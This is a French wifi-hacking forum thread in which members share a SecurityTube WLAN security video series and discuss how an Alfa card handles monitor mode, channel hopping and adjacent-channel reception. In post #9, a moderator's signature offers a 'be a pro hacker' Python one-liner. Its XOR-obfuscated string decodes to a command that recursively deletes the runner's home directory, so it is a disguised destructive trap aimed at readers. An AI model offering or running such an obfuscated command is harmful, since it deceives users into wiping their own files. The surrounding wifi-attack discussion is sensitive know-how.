Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-07-2011 21:51:39

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

WLAN Security Megaprimer une petit lien qui va vous plaire

Encore une petit lien bien sympa de chez tonton korben.

Il s'agit de tutos vidéo sur le piratage wifi, il y en a pour 4 gigas en provenance SecurityTube.
Je ne vous en dit pas plus, je vous laisse découvrir l'article.

Wlan security Megaprimer

[Source korben.info]

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-07-2011 22:03:51

Skeunk
Membre d'Or
Lieu : Chez Baby Fark McGee-zax

Re : WLAN Security Megaprimer une petit lien qui va vous plaire

Ca tombe bien, il pleut a longueur de journée chez moi sad
Je vais pouvoir m'occuper comme ca !
Merci beaucoup !!

"Nulla è reale, tutto è lecito. Requiescat in pace"

#3 27-07-2011 13:46:00

Manserk
Nouveau membre

merci !

l'accent indien est au anglais ce que l'accent canadien est aux français ! tongue

#4 28-07-2011 21:21:10

fe8769
Membre

c'est genial déjà l'accent indien et le "pouet pouet" des klaxon derrière . J'ai plus appris en 2 jours qu'en 3 ans grâce à lui

Peut être déplacer ce sujet dans vidéo ? non

#5 28-07-2011 21:23:10

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

fe8769 a écrit :

Peut être déplacer ce sujet dans vidéo ? non

Bonne suggestion wink

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 30-05-2013 20:26:11

Duagt
Membre Actif

Je comprend pas une chose dans cette vidéo (la troisieme)

il explique que le AWUS036H peut se connecter seulent a un channel à la fois, car il n'a qu'une seule puce radio.
OK.

ensuite il cré deux interface sur cette carte,  une en mode normal, lautre en mode monitor.
Jusque la ok (j'imagine que cest juste d'un point de vue software si on ignore ou pas les packet, et sur quelle interface on les fait suivre)

ensuite il fait un test :
_sur une interface il spam des beacon, des nom de SSID sur plusieurs channels
_de l'autre il sniff plusieurs channel (pas les mêmes)

mais techniquement, en toute logique, pour faire ces deux choses parrallelement, ça veut dire qu'il alterne sequentiellement, et tres rapidement les  channels, d'un point de vue hardware/driver, chacun son tour. (vu quil peut pas être sur deux channel en meme temps)

Alors ma question est celle ci :
Si tout se fait sequentiellement, sur des channels different, comment le sniffer parviens à écouter les informations emises sur dautres channels au meme moment ?

Pour moi cest un peu comme respirer et avaler, on peut pas faire les deux en meme temps.

#7 30-05-2013 22:39:43

antares145
Membre d'honneur
Site Web

Ton analyse est exacte, physiquement la carte ne peut travaille que sur un seul canal (puisque son circuit électronique doit se caler sur une fréquence précise). Après, on peut sauter d'un canal à l'autre plus ou moins rapidement, mais alors on perdra toujours une partie du trafic (sur les canaux non-surveillés).

Sur les versions récents d'airodump-ng (et avec de bons pilotes), tu verras d'ailleurs souvent que mon0 est "verrouillée" sur un canal et que tu ne peux pas en changer. Ca veut dire qu'un autre programme a le contrôle de la carte et qu'il ne veut pas changer de fréquence (parce que tu es connecté "normalement" à un réseau par exemple) wink

Bien vu pour l'analyse technique, même si la comparaison n'est pas tout à fait exacte : les nourrissons peuvent respirer et avaler en même temps (nous perdons cette faculté en grandissant) smile

#8 31-05-2013 18:26:44

Duagt
Membre Actif

Cela ne me dit pas comment il parviens avec l'un des programme
à scanne l'ensemble des canaux,
pendant que sur l'autre, il emet sur un cannaux precis.
Ni comment, à une seconde donnée, il peut à la fois emettre et recevoir.

Et donc voir ses propre canaux émis.

Je vais prendre la comparaison d'un talkiwalki, qui me parait plus proche.
On est sur un canal donné, et on choisit entre emettre et recevoir.
Jamais, via un talkiwalkie on pourra entendre sa propre voix.

Pourtant, avec airodump&co il y parviens...

#9 01-06-2013 10:33:09

spawn
Modérateur

Émettre et recevoir, en radio, ce n'est pas pareil.
Tu émet sur une fréquence (parce que sinon c'est le foutoir), mais tu recois une seule et unique vague éléctromagnétique, sur laquelle une transformée de fourier te permet d'isoler une fréquence.
Je ne sais pas comment fonctionnent les puces dans les alfa, mais l'émission et la réception doivent être séparées.

Et les métaphores c'est pas top quand on maîtrise pas l'ensemble des éléments :
Tu peux siffler sur une note (une fréquence) avec ta bouche, et écouter sur plein de fréquences (des graves aux aigus) avec tes oreilles.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#10 01-06-2013 10:53:04

antares145
Membre d'honneur
Site Web

Duagt a écrit :

mais techniquement, en toute logique, pour faire ces deux choses parrallelement, ça veut dire qu'il alterne sequentiellement, et tres rapidement les  channels, d'un point de vue hardware/driver, chacun son tour. (vu quil peut pas être sur deux channel en meme temps)

Je pense que c'est ça l'explication wink

Déjà, je vois pas dans la vidéo où il "fixe" un canal (mais j'avoue que je n'ai pas eu le courage de tout regarder en entier). Wireshark écoute sur le "canal en cours" mais n'a aucune influence sur ce dernier, et MDK3 émet des trames Beacon sur plusieurs canaux différents. Ou alors j'ai loupé le moment intéressant, dis-moi à quel moment de la vidéo ça pose problème.

Une puce radio ne peut effectivement pas émettre et recevoir en même temps (sur la même chaîne Radio, on oublie le MIMO pour l'instant). Par contre, le passage du RX au TX (réception et émission) se fait très rapidement (fréquence de fonctionnement élevée). Donc "virtuellement" tu as l'impression qu'il peut faire les deux en même temps.

Pour ce qui est de "scanner plusieurs canaux en même temps", ce serait impossible si les canaux ne se chevauchaient pas, or dans le cas du WiFi ils se recouvrent :

2.4_GHz_Wi-Fi_channels_(802.11b,g_WLAN).png

Donc quand tu écoutes sur le canal 6 (par exemple) tu récupères aussi une partie du 3, du 4, du 5, etc... A une puissance inférieure au "vrai" canal 6, mais tu chopes quand même une partie.

Et puis comme je le disais, même en mode "channel hop" (passage rapide d'un canal à l'autre), si tu passes disons 1/2 ou 1/4 de seconde sur un canal donné, ça te donne le temps de récupérer un certain nombre de paquets, donc on peut croire que tu peux écouter le trafic de plusieurs canaux. Mais si tu essaies de capturer une séquence TCP (par exemple) en channel hop, tu verras qu'il te manquera rapidement des paquets (qui ont été émis sur un canal non "surveillé"). Évidemment ça aide si tu restes sur des canaux "adjacents" où tu as quand même une chance de récupérer les données émises, mais c'est pas garanti non plus wink

@spawn : n'oublie quand même pas que les récepteurs (Alfa ou autres) utilisent des filtres passe-bande pour ne garder que les fréquences "utiles" et limiter le bruit pour le décodage smile

#11 02-06-2013 11:30:17

flatounet
Membre V.I.P.

ouep ,
à quand une maj un soft pour géré plusieur carte wifi à la fois ?

j'ai 4 aw036h , mais aucun soft ne gere plusieur carte à la fois
(meme multi session)
(conflit dans les mon ,montre qu'il travail en mon0  ou 1 - 2 - 3  ,mais à chaque fois
ils recuperent les ivs sur le mon0 ....)
obligé de tout me tapé en console interface et AP pars AP...

#12 02-06-2013 18:25:34

Duagt
Membre Actif

@antares : ducoup je dois en conclure que avec les asus lorsqu'elle ecoute le canal4, elle recoit , post filtre, aussi des paquets du 3 et du 5 , ou pas ?

#13 07-06-2013 23:41:55

antares145
Membre d'honneur
Site Web

Duagt a écrit :

@antares : ducoup je dois en conclure que avec les asus lorsqu'elle ecoute le canal4, elle recoit , post filtre, aussi des paquets du 3 et du 5 , ou pas ?

Tu en conclus ce que tu veux, vis ta vie ! tongue

D'un point de vue physique, oui c'est "inévitable" tu chopes des signaux des fréquences voisines. Après, quand ta carte fonctionne en mode "normal" elle jette rapidement ces données parasites pour ne garder que les paquets qui lui sont adressés.
Mais en mode Monitor (qui, pour faire simple, laisse passer tous les paquets "valides" > non-corrompus), tu verras probablement des données des autres canaux (si la puissance d'émission des sources est suffisante).

T'as qu'à faire l'essai, tu te cales sur un canal précis en mon0, tu lances une écoute avec Wireshark, et tu vois ce que tu récoltes. Si les sources sont des AP des canaux adjacents, tu auras ta réponse wink

Au passage, c'est bien d'AWUS et pas ASUS qu'on parle, et ce n'est pas propre à cette marque, tu auras des résultats similaires avec "n'importe quel" adaptateur. Le truc c'est que l'AWUS036H a un sensibilité très élevée donc elle récupère plus facilement des signaux faibles smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]